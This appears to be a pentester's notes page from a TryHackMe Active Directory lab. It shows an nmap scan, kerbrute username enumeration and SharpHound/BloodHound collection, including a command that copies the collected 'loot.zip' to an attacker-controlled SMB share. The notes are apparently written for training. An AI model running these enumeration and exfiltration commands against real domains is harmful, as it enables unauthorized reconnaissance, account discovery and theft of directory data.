Active Directory - Enumeration
Information gathering
Information gathering on services like RDP can tell you relatively good information about an Active Diretory host or domain.
- Target :
THM-AD - Domain :
spookysec.local - DNS Enty :
AttacktiveDirectory.spookysec.local
$ nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389 -sV -sC -oN scan.vuln.nmap 10.10.169.152
[...]
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-02-13T17:33:50
|_Not valid after: 2022-08-15T17:33:50
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-02-14T18:27:20+00:00
|_ssl-date: 2022-02-14T18:27:30+00:00; -1s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
User enumeration
$ kerbrute userenum --dc 10.10.169.152 -d spookysec.local userlist.txt
[...]
2022/02/14 19:37:15 > Using KDC(s):
2022/02/14 19:37:15 > 10.10.169.152:88
2022/02/14 19:37:16 > [+] VALID USERNAME: james@spookysec.local
2022/02/14 19:37:17 > [+] VALID USERNAME: svc-admin@spookysec.local
2022/02/14 19:37:19 > [+] VALID USERNAME: James@spookysec.local
2022/02/14 19:37:20 > [+] VALID USERNAME: robin@spookysec.local
2022/02/14 19:37:28 > [+] VALID USERNAME: darkstar@spookysec.local
2022/02/14 19:37:33 > [+] VALID USERNAME: administrator@spookysec.local
[...]
BloodHound
BloodHound allows you to make a graph of an Active Directory domain and quickly find misconfiguration vulnerabilities in it.
- Graphic viewer : BloodHound
- Collector : SharpHound
- Graph database : neo4j
Get started
- Download SharpHound on the victim host.
- Using powershell version :
- Load SharpHound :
.\SharpHound.ps1 - Start SharpHound collection :
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- Load SharpHound :
- Using exectuable version :
- Start SharpHound collection :
.\SharpHound.exe -d CONTROLLER.local --zipfilename loot.zip
- Start SharpHound collection :
- Download the archive result on your attacker machine :
copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip - Run neo4j server :
sudo docker run --rm -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=neo4j/toto -v /tmp/neo4j/data:/data neo4j - Run BloodHound : Download release and execute
./BloodHound-linux-x64/BloodHound- Host :
bolt://localhost:7687 - Username :
neo4j - Password :
toto
- Host :
- Drag and drop
loot.zipintoBloodhound.
You can run pre-defined queries by clicking on <menu burger icon>, then Analysis and finally on the queries you want to execute.